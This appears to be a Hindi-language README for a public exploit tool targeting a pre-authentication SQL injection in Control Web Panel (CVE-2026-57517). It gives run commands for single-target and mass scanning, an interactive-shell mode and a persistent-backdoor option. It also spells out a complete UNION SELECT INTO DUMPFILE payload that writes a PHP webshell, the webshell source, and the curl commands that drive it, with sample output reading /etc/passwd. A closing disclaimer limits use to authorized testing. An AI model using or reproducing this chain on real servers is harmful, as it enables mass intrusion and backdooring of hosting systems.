
💉 Blind SQL Injection → RCE exploit के लिए Control Web Panel (CWP) ≤ 0.9.8.1224 — userRes POST → INTO DUMPFILE → cwpsvc shell
CVE-2026-57517 Control Web Panel (CWP) संस्करण ≤ 0.9.8.1224 में एक महत्वपूर्ण प्री-प्रमाणीकरण ब्लाइंड SQL इंजेक्शन है। उपयोगकर्ता पैनल एंडपॉइंट पर POST पैरामीटर को SQL क्वेरी में एम्बेड करने से पहले स्वच्छ नहीं किया जाता। क्वेरियाँ विशेषाधिकारों के साथ निष्पादित होती हैं — जिसके पास वैश्विक विशेषाधिकार है — जो हमलावरों को के माध्यम से मनमानी फ़ाइलें लिखने की अनुमति देता है।
userResFILEINTO DUMPFILEविशिष्ट शोषण श्रृंखला वेब-सुलभ Roundcube लॉग निर्देशिका में एक PHP वेबशेल तैनात करती है, जो cwpsvc सेवा खाते के रूप में रिमोट कोड निष्पादन प्राप्त करती है।
| फ़ील्ड | विवरण |
|---|---|
| CVE | CVE-2026-57517 |
| CVSS | 9.8 (क्रिटिकल) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| प्रकार | CWE-89 — ब्लाइंड SQL इंजेक्शन (प्री-प्रमाणीकरण) |
| प्रभावित | Control Web Panel ≤ 0.9.8.1224 |
| ठीक | संस्करण 0.9.8.1225 |
| प्रकटीकरण | 1 जुलाई, 2026 |
| शोधकर्ता | Egidio Romano (Karma In Security) |
| PoC | सार्वजनिक — KIS-2026-12 |
git clone https://github.com/shinthink/CVE-2026-57517.git
cd CVE-2026-57517
pip install -r requirements.txt
# एकल लक्ष्य (स्वचालित रूप से उपयोगकर्ता नाम पता लगाएं)
python cve_2026_57517.py -t 192.168.1.100
# ज्ञात उपयोगकर्ता नाम के साथ एकल लक्ष्य
python cve_2026_57517.py -t 192.168.1.100 -u cwpsvc
# सामूहिक स्कैन
python cve_2026_57517.py -f targets.txt -o live.txt
# इंटरैक्टिव शेल
python cve_2026_57517.py -t target.com --rce -u cwpsvc
# स्थायी बैकडोर (कोई स्वचालित सफाई नहीं)
python cve_2026_57517.py -t target.com --no-cleanup
-t, --target एकल लक्ष्य होस्ट
-f, --file लक्ष्यों वाली फ़ाइल (प्रति पंक्ति एक)
-u, --username CWP उपयोगकर्ता नाम (स्वचालित पहचान छोड़ता है)
-o, --output लाइव TXT आउटपुट फ़ाइल
--json JSON रिपोर्ट फ़ाइल
--threads समवर्ती कार्यकर्ता (डिफ़ॉल्ट: 20)
--timeout अनुरोध टाइमआउट सेकंड (डिफ़ॉल्ट: 15)
--no-cleanup लक्ष्य पर शेल छोड़ें
--rce इंटरैक्टिव शेल मोड
-v, --verbose विस्तृत आउटपुट
$ python cve_2026_57517.py -f targets.txt -o live.txt -v
────────────────────────────────────────────────────────────
CVE-2026-57517 | 5 लक्ष्य | 20 थ्रेड
सफाई: हाँ
लाइव TXT: live.txt
────────────────────────────────────────────────────────────
✅ 192.168.10.100:2083 [rce_confirmed] 18.2s
उपयोगकर्ता : admin
शेल : https://192.168.10.100:2031/roundcube/logs/cwp_a3f2b9c1d8e4.php
RCE : uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)
cwp-prod-01.example.com
whoami: cwpsvc
⚠️ 192.168.10.200:2083 [sqli_failed] 12.1s
उपयोगकर्ता : cwpsvc
त्रुटि : SQL इंजेक्शन विफल — लक्ष्य पैच किया जा सकता है या पथ लिखने योग्य नहीं
· 192.168.10.50:2083 [not_cwp] 2.3s
==================================================
स्कैन सारांश
==================================================
कुल : 5
✅ RCE : 2
⚠️ SQLi विफल : 1
🔍 कोई उपयोगकर्ता नहीं : 1
· CWP नहीं : 1
==================================================
$ python cve_2026_57517.py -t target.com --rce -u admin
CWP इंटरैक्टिव शेल — target.com
बाहर निकलने के लिए 'exit' टाइप करें, शेल हटाने के लिए 'cleanup'
cwp$ id
uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)
cwp$ hostname
cwp-prod-01
cwp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
cwpsvc:x:1001:1001::/home/cwpsvc:/bin/bash
cwp$ exit
चरण 1 — सत्यापित करें कि CWP पोर्ट 2083 पर पहुंच योग्य है
curl -sk 'https://target.com:2083/' | grep -i 'control web panel\|CWP'
चरण 2 — उपयोगकर्ता नाम मान्य करें
curl -sk -o /dev/null -w "%{http_code}" 'https://target.com:2083/admin/'
# 200 = उपयोगकर्ता मौजूद है
चरण 3 — userRes के माध्यम से SQL इंजेक्शन
पेलोड INTO DUMPFILE के माध्यम से लिखे गए हेक्स-एन्कोडेड PHP शेल के साथ 13-कॉलम UNION SELECT का उपयोग करता है:
" UNION SELECT 1,0x{HEX_PHP_SHELL},3,4,5,6,7,8,9,10,11,12,13
INTO DUMPFILE '/usr/local/cwpsrv/var/services/roundcube/logs/shell.php' #
# उपकरण स्वचालित रूप से हेक्स एन्कोडिंग संभालता है। मैन्युअल समतुल्य:
PAYLOAD='" UNION SELECT 1,0x3c3f706870206576616c286261736536345f6465636f646528245f5345525645525b22485454505f43225d29293b203f3e,3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE '\''/usr/local/cwpsrv/var/services/roundcube/logs/shell.php'\'' #'
curl -sk 'https://target.com:2083/admin/' \
-d "userRes=$PAYLOAD"
चरण 4 — वेबशेल के माध्यम से कमांड निष्पादित करें (पोर्ट 2031)
तैनात PHP शेल C: HTTP हेडर से कमांड पढ़ता है:
<?php eval(base64_decode($_SERVER['HTTP_C'])); ?>
# Base64-encode: print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';
PHP=$(echo "print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';" | base64 -w0)
curl -sk 'https://target.com:2031/roundcube/logs/shell.php' -H "C: $PHP"
# uid=1001(cwpsvc) gid=1001(cwpsvc)
| घटक | मान |
|---|---|
| SQL कॉलम | 13-कॉलम UNION SELECT |
| PHP शेल | <?php eval(base64_decode($_SERVER['HTTP_C'])); ?> |
| हेक्स एन्कोडिंग | MySQL 0x... हेक्स लिटरल |
| लेखन विधि | INTO DUMPFILE (बाइनरी-सटीक फ़ाइल लेखन) |
| लक्ष्य पथ | /usr/local/cwpsrv/var/services/roundcube/logs/{uniqid}.php |
| कमांड वितरण | बेस64-एन्कोडेड PHP के साथ HTTP हेडर C: |
| कमांड निष्पादक | passthru(base64_decode('{cmd}')) |
🚨 केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए
यह सॉफ़्टवेयर केवल शैक्षिक उद्देश्यों और वैध सुरक्षा अनुसंधान के लिए प्रदान किया गया है। इसका उपयोग निम्नलिखित द्वारा किए जाने का इरादा है:
- 🛡️ सुरक्षा पेशेवर अधिकृत प्रवेश परीक्षण आयोजित कर रहे हैं
- 🏢 संगठन अपने स्वयं के CWP बुनियादी ढांचे का ऑडिट कर रहे हैं
- 🔬 शोधकर्ता भेद्यता शोषण तकनीकों का अध्ययन कर रहे हैं
- 🎓 छात्र वेब एप्लिकेशन सुरक्षा के बारे में सीख रहे हैं
❌ आप इस सॉफ़्टवेयर का उपयोग निम्नलिखित के लिए नहीं कर सकते:
- स्पष्ट लिखित प्राधिकरण के बिना कंप्यूटर सिस्टम तक पहुँचना
- उन सिस्टम से समझौता करना, क्षति पहुँचाना या बाधित करना जिनके आप मालिक नहीं हैं
- किसी भी प्रकार की अवैध गतिविधि में संलग्न होना
⚖️ कानूनी सूचना
कंप्यूटर सिस्टम तक अनधिकृत पहुँच कानूनों का उल्लंघन करती है जिनमें शामिल हैं लेकिन इन्हीं तक सीमित नहीं:
- संयुक्त राज्य अमेरिका: कंप्यूटर धोखाधड़ी और दुरुपयोग अधिनियम (18 U.S.C. § 1030)
- इंडोनेशिया: UU ITE धारा 30 और 46 (UU संख्या 11 वर्ष 2008 जो. UU संख्या 1 वर्ष 2024)
- यूरोपीय संघ: निर्देश 2013/40/EU
- यूनाइटेड किंगडम: कंप्यूटर दुरुपयोग अधिनियम 1990
लेखक इस उपकरण के उपयोग से उत्पन्न किसी भी दुरुपयोग, क्षति या कानूनी परिणामों के लिए कोई दायित्व नहीं मानते हैं। इस सॉफ़्टवेयर का उपयोग करके, आप स्वीकार करते हैं कि आप अपने कार्यों के लिए पूरी तरह से जिम्मेदार हैं और सभी लागू कानूनों का पालन करने के लिए सहमत हैं।
| संसाधन | लिंक |
|---|---|
| Karma In Security सलाह | KIS-2026-12 |
| मूल PoC | CVE-2026-57517.php |
| पूर्ण प्रकटीकरण | SecLists |
| OpenCVE | CVE-2026-57517 |
| CWP परिवर्तन लॉग | control-webpanel.com |
⚡ सुरक्षा अनुसंधान और शिक्षा के लिए निर्मित ⚡
यह परियोजना Control Web Panel या Apache Software Foundation से संबद्ध नहीं है।